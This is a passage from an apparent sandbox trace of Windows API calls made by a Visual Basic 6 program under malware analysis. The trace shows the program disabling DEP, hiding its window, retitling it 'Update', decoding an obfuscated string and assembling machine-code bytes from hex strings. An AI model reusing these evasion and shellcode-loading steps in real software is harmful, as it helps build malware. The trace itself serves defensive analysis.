(lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x5, wParam=0x0, lParam=0x1900e9) returned 0x0 [0194.163] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x3, wParam=0x0, lParam=0xa80010) returned 0x0 [0194.163] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x30, wParam=0x420a09aa, lParam=0x0) returned 0x0 [0194.164] ShowWindow (hWnd=0x502b8, nCmdShow=5) returned 0 [0194.164] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x502b8, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0194.164] lstrlenA (lpString="ThunderRT6") returned 10 [0194.164] lstrcpyA (in: lpString1=0x18fa58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.164] lstrlenA (lpString="ThunderRT6") returned 10 [0194.164] lstrcpyA (in: lpString1=0x18f9ec, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.164] GetClassInfoA (in: hInstance=0x0, lpClassName="ListBox", lpWndClass=0x18fa18 | out: lpWndClass=0x18fa18) returned 1 [0194.164] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6ListBox", lpWndClass=0x18fa18 | out: lpWndClass=0x18fa18) returned 0 [0194.164] RegisterClassA (lpWndClass=0x18fa18) returned 0xc1f1 [0194.164] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1f1, lpWindowName=0x0, dwStyle=0x44310081, X=16, Y=24, nWidth=481, nHeight=134, hWndParent=0x502a0, hMenu=0x3, hInstance=0x72940000, lpParam=0x0) returned 0x5028e [0194.165] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x81, wParam=0x0, lParam=0x18f63c) returned 0x1 [0194.165] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x83, wParam=0x0, lParam=0x18f628) returned 0x0 [0194.166] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x1, wParam=0x0, lParam=0x18f63c) returned 0x1 [0194.254] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x5, wParam=0x0, lParam=0x7101cc) returned 0x0 [0194.254] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x46, wParam=0x0, lParam=0x18f1b4) returned 0x0 [0194.254] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x83, wParam=0x1, lParam=0x18f18c) returned 0x0 [0194.255] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x47, wParam=0x0, lParam=0x18f1b4) returned 0x0 [0194.255] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x5, wParam=0x0, lParam=0x6f01cc) returned 0x0 [0194.256] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x46, wParam=0x0, lParam=0x18e6dc) returned 0x0 [0194.256] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x83, wParam=0x1, lParam=0x18e6b4) returned 0x0 [0194.257] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x47, wParam=0x0, lParam=0x18e6dc) returned 0x0 [0194.257] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x5, wParam=0x0, lParam=0x6f01dd) returned 0x0 [0194.301] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x46, wParam=0x0, lParam=0x18dc1c) returned 0x0 [0194.301] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x83, wParam=0x1, lParam=0x18dbf4) returned 0x0 [0194.303] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x47, wParam=0x0, lParam=0x18dc1c) returned 0x0 [0194.303] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x5, wParam=0x0, lParam=0x8001dd) returned 0x0 [0194.307] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x3, wParam=0x0, lParam=0x1a0012) returned 0x0 [0194.307] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x30, wParam=0x650a07c3, lParam=0x0) returned 0x0 [0194.307] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x46, wParam=0x0, lParam=0x18f6f4) returned 0x0 [0194.307] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x83, wParam=0x1, lParam=0x18f6cc) returned 0x0 [0194.309] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x47, wParam=0x0, lParam=0x18f6f4) returned 0x0 [0194.309] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x5, wParam=0x0, lParam=0x7501dd) returned 0x0 [0194.310] ShowWindow (hWnd=0x5028e, nCmdShow=5) returned 0 [0194.310] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0194.310] lstrlenA (lpString="2") returned 1 [0194.311] lstrlenA (lpString="ThunderRT6") returned 10 [0194.311] lstrcpyA (in: lpString1=0x18fa58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.311] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1f0, lpWindowName="2", dwStyle=0x44012000, X=272, Y=168, nWidth=225, nHeight=25, hWndParent=0x502a0, hMenu=0x4, hInstance=0x72940000, lpParam=0x0) returned 0x402bc [0194.311] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x81, wParam=0x0, lParam=0x18f63c) returned 0x1 [0194.312] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x83, wParam=0x0, lParam=0x18f628) returned 0x0 [0194.312] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x1, wParam=0x0, lParam=0x18f63c) returned 0x0 [0194.312] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x5, wParam=0x0, lParam=0x1900e1) returned 0x0 [0194.312] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x3, wParam=0x0, lParam=0xa80110) returned 0x0 [0194.312] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x30, wParam=0x420a09aa, lParam=0x0) returned 0x0 [0194.312] ShowWindow (hWnd=0x402bc, nCmdShow=5) returned 0 [0194.312] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x402bc, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0194.313] lstrlenA (lpString="Run Selected") returned 12 [0194.313] lstrcpyA (in: lpString1=0x18fa88, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0194.313] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1f0, lpWindowName="Run Selected", dwStyle=0x44012000, X=16, Y=240, nWidth=521, nHeight=25, hWndParent=0x7028c, hMenu=0x5, hInstance=0x72940000, lpParam=0x0) returned 0x40278 [0194.313] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x81, wParam=0x0, lParam=0x18f66c) returned 0x1 [0194.313] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x83, wParam=0x0, lParam=0x18f658) returned 0x0 [0194.314] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x1, wParam=0x0, lParam=0x18f66c) returned 0x0 [0194.314] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x5, wParam=0x0, lParam=0x190209) returned 0x0 [0194.314] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x3, wParam=0x0, lParam=0xf00010) returned 0x0 [0194.315] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x30, wParam=0x650a07c3, lParam=0x0) returned 0x0 [0194.315] ShowWindow (hWnd=0x40278, nCmdShow=5) returned 0 [0194.315] CallWindowProcA (lpPrevWndFunc=0x77e9abd3, hWnd=0x40278, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0194.315] GetClientRect (in: hWnd=0x7028c, lpRect=0x18fbf8 | out: lpRect=0x18fbf8) returned 1 [0194.315] MapWindowPoints (in: hWndFrom=0x7028c, hWndTo=0x0, lpPoints=0x18fbf8, cPoints=0x2 | out: lpPoints=0x18fbf8) returned 9568384 [0194.315] EqualRect (lprc1=0x18fbf8, lprc2=0x18fbd8) returned 1 [0194.315] SetEvent (hEvent=0xb4) returned 1 [0194.315] SendMessageA (hWnd=0x7028c, Msg=0x80, wParam=0x1, lParam=0x70285) returned 0x0 [0194.315] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x80, wParam=0x1, lParam=0x70285) returned 0x0 [0194.327] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x18fab4 | out: ppstm=0x18fab4*=0x5e0940) returned 0x0 [0194.328] GetSystemMetrics (nIndex=49) returned 16 [0194.328] GetSystemMetrics (nIndex=50) returned 16 [0194.328] IStream:RemoteSeek (in: This=0x5e0940, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0194.328] ISequentialStream:RemoteRead (in: This=0x5e0940, pv=0x18fa64, cb=0x6, pcbRead=0x0 | out: pv=0x18fa64*=0x0, pcbRead=0x0) returned 0x0 [0194.328] ISequentialStream:RemoteRead (in: This=0x5e0940, pv=0x18fa3c, cb=0x10, pcbRead=0x0 | out: pv=0x18fa3c*=0x20, pcbRead=0x0) returned 0x0 [0194.328] ISequentialStream:RemoteRead (in: This=0x5e0940, pv=0x18fa3c, cb=0x10, pcbRead=0x0 | out: pv=0x18fa3c*=0x10, pcbRead=0x0) returned 0x0 [0194.328] IStream:RemoteSeek (in: This=0x5e0940, dlibMove=0x26, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0194.328] GlobalLock (hMem=0x2a2000c) returned 0x5e2c88 [0194.328] ISequentialStream:RemoteRead (in: This=0x5e0940, pv=0x5e2c88, cb=0x28, pcbRead=0x0 | out: pv=0x5e2c88*=0x28, pcbRead=0x0) returned 0x0 [0194.328] ISequentialStream:RemoteRead (in: This=0x5e0940, pv=0x5e2cb0, cb=0x880, pcbRead=0x0 | out: pv=0x5e2cb0*=0x0, pcbRead=0x0) returned 0x0 [0194.328] GlobalUnlock (hMem=0x2a2000c) returned 0 [0194.328] GlobalLock (hMem=0x2a2000c) returned 0x5e2c88 [0194.328] GlobalSize (hMem=0x2a2000c) returned 0x8a8 [0194.328] GetDC (hWnd=0x0) returned 0x6401089b [0194.328] CreateCompatibleBitmap (hdc=0x6401089b, cx=32, cy=32) returned 0x3b0509a3 [0194.328] SelectObject (hdc=0x330107bb, h=0x3b0509a3) returned 0x185000f [0194.328] StretchDIBits (hdc=0x330107bb, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=32, SrcHeight=32, lpBits=0x5e30b0, lpbmi=0x5e2c88, iUsage=0x0, rop=0xcc0020) returned 32 [0194.328] GetObjectA (in: h=0x3b0509a3, c=24, pv=0x18f9d4 | out: pv=0x18f9d4) returned 24 [0194.329] GlobalLock (hMem=0x2a2001c) returned 0x5e3540 [0194.329] GetBitmapBits (in: hbit=0x3b0509a3, cb=4096, lpvBits=0x5e3540 | out: lpvBits=0x5e3540) returned 4096 [0194.329] SelectObject (hdc=0x330107bb, h=0x185000f) returned 0x3b0509a3 [0194.329] DeleteObject (ho=0x3b0509a3) returned 1 [0194.329] CreateBitmap (nWidth=32, nHeight=32, nPlanes=0x1, nBitCount=0x1, lpBits=0x0) returned 0x3c0509a3 [0194.329] SelectObject (hdc=0x330107bb, h=0x3c0509a3) returned 0x185000f [0194.329] StretchDIBits (hdc=0x330107bb, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=32, SrcHeight=32, lpBits=0x5e34b0, lpbmi=0x5e2c88, iUsage=0x0, rop=0xcc0020) returned 32 [0194.329] GetObjectA (in: h=0x3c0509a3, c=24, pv=0x18f9bc | out: pv=0x18f9bc) returned 24 [0194.329] GlobalLock (hMem=0x2a20024) returned 0x5e5ad8 [0194.329] GetBitmapBits (in: hbit=0x3c0509a3, cb=128, lpvBits=0x5e5ad8 | out: lpvBits=0x5e5ad8) returned 128 [0194.329] CreateIcon (hInstance=0x400000, nWidth=32, nHeight=32, cPlanes=0x1, cBitsPixel=0x20, lpbANDbits=0x5e5ad8, lpbXORbits=0x5e3540) returned 0x60231 [0194.329] GlobalUnlock (hMem=0x2a2001c) returned 0 [0194.329] GlobalUnlock (hMem=0x2a20024) returned 0 [0194.329] SelectObject (hdc=0x330107bb, h=0x185000f) returned 0x3c0509a3 [0194.329] DeleteObject (ho=0x3c0509a3) returned 1 [0194.329] ReleaseDC (hWnd=0x0, hDC=0x6401089b) returned 1 [0194.329] GlobalUnlock (hMem=0x2a2000c) returned 0 [0194.329] SendMessageA (hWnd=0x7028c, Msg=0x80, wParam=0x0, lParam=0x60231) returned 0x0 [0194.329] NtdllDefWindowProc_A (hWnd=0x7028c, Msg=0x80, wParam=0x0, lParam=0x60231) returned 0x0 [0194.330] IUnknown:Release (This=0x5e0940) returned 0x0 [0194.330] MonitorFromWindow (hwnd=0x5028e, dwFlags=0x2) returned 0x10001 [0194.330] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fb44 | out: lpmi=0x18fb44) returned 1 [0194.330] GetWindowLongA (hWnd=0x5028e, nIndex=-16) returned 1409351809 [0194.361] GetWindowLongA (hWnd=0x5028e, nIndex=-20) returned 516 [0194.361] SelectObject (hdc=0x330107bb, h=0x650a07c3) returned 0x18a002e [0194.361] GetTextMetricsA (in: hdc=0x330107bb, lptm=0x18fa10 | out: lptm=0x18fa10) returned 1 [0194.361] SelectObject (hdc=0x330107bb, h=0x18a002e) returned 0x650a07c3 [0194.361] GetParent (hWnd=0x5028e) returned 0x502a0 [0194.361] GetWindowRect (in: hWnd=0x5028e, lpRect=0x18fb44 | out: lpRect=0x18fb44) returned 1 [0194.361] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x502a0, lpPoints=0x18fb44, cPoints=0x2 | out: lpPoints=0x18fb44) returned -10551440 [0194.361] MoveWindow (hWnd=0x5028e, X=16, Y=24, nWidth=481, nHeight=134, bRepaint=1) returned 1 [0194.362] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x46, wParam=0x0, lParam=0x18fae0) returned 0x0 [0194.362] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x83, wParam=0x1, lParam=0x18fab8) returned 0x0 [0194.363] GetParent (hWnd=0x5028e) returned 0x502a0 [0194.363] GetWindowRect (in: hWnd=0x5028e, lpRect=0x18f814 | out: lpRect=0x18f814) returned 1 [0194.363] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x502a0, lpPoints=0x18f814, cPoints=0x2 | out: lpPoints=0x18f814) returned -10551440 [0194.363] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x47, wParam=0x0, lParam=0x18fae0) returned 0x0 [0194.363] GetWindowLongA (hWnd=0x5028e, nIndex=-16) returned 1409351809 [0194.363] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x5, wParam=0x0, lParam=0x8201dd) returned 0x0 [0194.364] GetParent (hWnd=0x5028e) returned 0x502a0 [0194.364] GetWindowRect (in: hWnd=0x5028e, lpRect=0x18fb44 | out: lpRect=0x18fb44) returned 1 [0194.364] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x502a0, lpPoints=0x18fb44, cPoints=0x2 | out: lpPoints=0x18fb44) returned -10551440 [0194.457] IsIconic (hWnd=0x7028c) returned 0 [0194.457] IsZoomed (hWnd=0x7028c) returned 0 [0194.457] GetClientRect (in: hWnd=0x7028c, lpRect=0x18fbec | out: lpRect=0x18fbec) returned 1 [0194.457] GetWindow (hWnd=0x7028c, uCmd=0x5) returned 0x502a0 [0194.457] GetWindow (hWnd=0x502a0, uCmd=0x2) returned 0x40278 [0194.457] GetParent (hWnd=0x502a0) returned 0x7028c [0194.458] GetWindow (hWnd=0x40278, uCmd=0x2) returned 0x0 [0194.458] GetParent (hWnd=0x40278) returned 0x7028c [0194.458] SysStringLen (param_1="kernel32") returned 0x8 [0194.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0194.458] SysStringLen (param_1="kernel32") returned 0x8 [0194.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kernel32", cchWideChar=9, lpMultiByteStr=0x5dd234, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kernel32", lpUsedDefaultChar=0x0) returned 9 [0194.458] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.458] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0194.458] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.459] GetProcAddress (hModule=0x76220000, lpProcName="GetModuleHandleA") returned 0x76231245 [0194.459] GetModuleHandleA (lpModuleName="kernel32") returned 0x76220000 [0194.459] GetLastError () returned 0x0 [0194.459] SysStringLen (param_1="SetProcessDEPPolicy") returned 0x13 [0194.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetProcessDEPPolicy", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0194.459] SysStringLen (param_1="SetProcessDEPPolicy") returned 0x13 [0194.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetProcessDEPPolicy", cchWideChar=20, lpMultiByteStr=0x5e0944, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetProcessDEPPolicy", lpUsedDefaultChar=0x0) returned 20 [0194.459] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.459] LoadLibraryA (lpLibFileName="kernel32") returned 0x76220000 [0194.459] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.459] GetProcAddress (hModule=0x76220000, lpProcName="GetProcAddress") returned 0x76231222 [0194.459] GetProcAddress (hModule=0x76220000, lpProcName="SetProcessDEPPolicy") returned 0x7624eb9a [0194.460] GetLastError () returned 0x0 [0194.460] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.460] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76220000 [0194.460] SetErrorMode (uMode=0x8001) returned 0x8001 [0194.460] GetProcAddress (hModule=0x76220000, lpProcName="SetProcessDEPPolicy") returned 0x7624eb9a [0194.460] SetProcessDEPPolicy (dwFlags=0x0) returned 1 [0194.460] GetLastError () returned 0x0 [0194.502] IsWindowVisible (hWnd=0x7028c) returned 0 [0194.502] ShowWindow (hWnd=0x7028c, nCmdShow=0) returned 0 [0194.502] GetCurrentThreadId () returned 0x94c [0194.502] GetCurrentThreadId () returned 0x94c [0194.502] GetCurrentThreadId () returned 0x94c [0194.503] SetWindowTextA (hWnd=0x40222, lpString="Update") returned 1 [0194.503] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0xc, wParam=0x0, lParam=0x237b740) returned 0x1 [0194.503] ShowWindow (hWnd=0x40222, nCmdShow=0) returned 1 [0194.503] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0194.503] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x46, wParam=0x0, lParam=0x18f8c8) returned 0x0 [0194.504] NtdllDefWindowProc_A (hWnd=0x40222, Msg=0x47, wParam=0x0, lParam=0x18f8c8) returned 0x0 [0194.550] GetUserDefaultLCID () returned 0x409 [0194.596] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f964, cchData=6 | out: lpLCData="1252") returned 5 [0194.596] SysStringLen (param_1="\"P7_6Yt\x06Q(@0_A(P=EL2]z\x01QeP/W*Z'H&X[C,I\x15c\x1cr\x15u`") returned 0xb9 [0194.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\"P7_6Yt\x06Q(@0_A(P=EL2]z\x01QeP/W*Z'H&X[C,I\x15c\x1cr\x15u`", cchWideChar=185, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 185 [0194.596] SysStringLen (param_1="\"P7_6Yt\x06Q(@0_A(P=EL2]z\x01QeP/W*Z'H&X[C,I\x15c\x1cr\x15u`") returned 0xb9 [0194.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\"P7_6Yt\x06Q(@0_A(P=EL2]z\x01QeP/W*Z'H&X[C,I\x15c\x1cr\x15u`", cchWideChar=186, lpMultiByteStr=0x5e2fcc, cbMultiByte=186, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"P7_6Yt\x06Q(@0_A(P=EL2]z\x01QeP/W*Z'H&X[C,I\x15c\x1cr\x15u`", lpUsedDefaultChar=0x0) returned 186 [0194.596] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x18f974 | out: ppsaOut=0x18f974) returned 0x0 [0194.596] SafeArrayAllocDescriptorEx (in: vt=0x8, cDims=0x1, ppsaOut=0x18f834 | out: ppsaOut=0x18f834) returned 0x0 [0194.642] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0194.642] IMalloc:Alloc (This=0x75e366bc, cb=0x44) returned 0x5e31c8 [0194.642] IMalloc:GetSize (This=0x75e366bc, pv=0x5e31c8) returned 0x44 [0194.643] GetUserDefaultLCID () returned 0x409 [0194.643] VarI2FromStr (in: strIn="&H55", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.643] GetUserDefaultLCID () returned 0x409 [0194.643] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.643] GetUserDefaultLCID () returned 0x409 [0194.644] VarI2FromStr (in: strIn="&HEC", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.644] GetUserDefaultLCID () returned 0x409 [0194.644] VarI2FromStr (in: strIn="&H83", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.644] GetUserDefaultLCID () returned 0x409 [0194.644] VarI2FromStr (in: strIn="&HC4", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.644] GetUserDefaultLCID () returned 0x409 [0194.644] VarI2FromStr (in: strIn="&HF4", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.644] GetUserDefaultLCID () returned 0x409 [0194.644] VarI2FromStr (in: strIn="&H60", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.644] GetUserDefaultLCID () returned 0x409 [0194.644] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.644] GetUserDefaultLCID () returned 0x409 [0194.645] VarI2FromStr (in: strIn="&H4D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.645] GetUserDefaultLCID () returned 0x409 [0194.645] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.645] GetUserDefaultLCID () returned 0x409 [0194.645] VarI2FromStr (in: strIn="&H89", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.645] GetUserDefaultLCID () returned 0x409 [0194.645] VarI2FromStr (in: strIn="&H4D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.645] GetUserDefaultLCID () returned 0x409 [0194.645] VarI2FromStr (in: strIn="&HFC", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.645] GetUserDefaultLCID () returned 0x409 [0194.645] VarI2FromStr (in: strIn="&H03", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.645] GetUserDefaultLCID () returned 0x409 [0194.645] VarI2FromStr (in: strIn="&H4D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.646] GetUserDefaultLCID () returned 0x409 [0194.646] VarI2FromStr (in: strIn="&H14", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.646] GetUserDefaultLCID () returned 0x409 [0194.646] VarI2FromStr (in: strIn="&H89", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.646] GetUserDefaultLCID () returned 0x409 [0194.646] VarI2FromStr (in: strIn="&H4D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.646] GetUserDefaultLCID () returned 0x409 [0194.646] VarI2FromStr (in: strIn="&HF4", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.646] GetUserDefaultLCID () returned 0x409 [0194.646] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.647] GetUserDefaultLCID () returned 0x409 [0194.647] VarI2FromStr (in: strIn="&H4D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.647] GetUserDefaultLCID () returned 0x409 [0194.647] VarI2FromStr (in: strIn="&H10", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.647] GetUserDefaultLCID () returned 0x409 [0194.647] VarI2FromStr (in: strIn="&H8A", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.647] GetUserDefaultLCID () returned 0x409 [0194.647] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.647] GetUserDefaultLCID () returned 0x409 [0194.647] VarI2FromStr (in: strIn="&H88", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.647] GetUserDefaultLCID () returned 0x409 [0194.647] VarI2FromStr (in: strIn="&H45", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.648] GetUserDefaultLCID () returned 0x409 [0194.648] VarI2FromStr (in: strIn="&HFB", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.648] GetUserDefaultLCID () returned 0x409 [0194.648] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.648] GetUserDefaultLCID () returned 0x409 [0194.648] VarI2FromStr (in: strIn="&H4D", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.648] GetUserDefaultLCID () returned 0x409 [0194.648] VarI2FromStr (in: strIn="&H0C", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.648] GetUserDefaultLCID () returned 0x409 [0194.648] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.649] GetUserDefaultLCID () returned 0x409 [0194.649] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.649] GetUserDefaultLCID () returned 0x409 [0194.649] VarI2FromStr (in: strIn="&H08", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.649] GetUserDefaultLCID () returned 0x409 [0194.649] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: psOut=0x18f69e) returned 0x0 [0194.649] GetUserDefaultLCID () returned 0x409 [0194.649] VarI2FromStr (in: strIn="&HFE", lcid=0x409, dwFlags=0x0, psOut=0x18f69e | out: 